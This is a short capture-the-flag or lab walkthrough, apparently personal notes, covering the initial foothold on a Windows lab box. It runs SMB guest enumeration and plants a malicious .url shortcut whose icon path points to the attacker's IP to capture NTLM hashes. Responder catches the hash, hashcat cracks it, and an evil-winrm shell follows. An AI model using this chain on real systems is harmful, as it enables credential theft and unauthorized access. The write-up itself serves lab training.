Foothold

$ netexec smb 192.168.154.172 -u 'Guest' -p '' --shares

$ smbclient '\\192.168.213.172\DocumentsShare' -U Guest%''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug 30 07:51:55 2024
  ..                                  D        0  Fri Aug 30 07:51:55 2024

		7706623 blocks of size 4096. 725530 blocks available

RW means we should probably upload a malicious document

Create shortcut with a Icon that points back to us

[InternetShortcut]
URL=pwned
WorkingDirectory=pwned
IconFile=\\192.168.45.233\%USERNAME%.icon
IconIndex=1

$ sudo responder -I tun0 -A

$ hashcat -m 5600 anirudh.hash ~/rockyou.txt -O

anirudh:SecureHM

$ netexec winrm 192.168.229.172 -u 'anirudh' -p 'SecureHM'

$ evil-winrm -u 'anirudh' -p 'SecureHM' -i 192.168.229.172                          
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami ; type C:\Users\anirudh\Desktop\local.txt ; ipconfig
vault\anirudh
2f62d26d944f9393461ee79dc24b346b

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.229.172
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254

Previous389 NextEnumeration

Last updated 1 year ago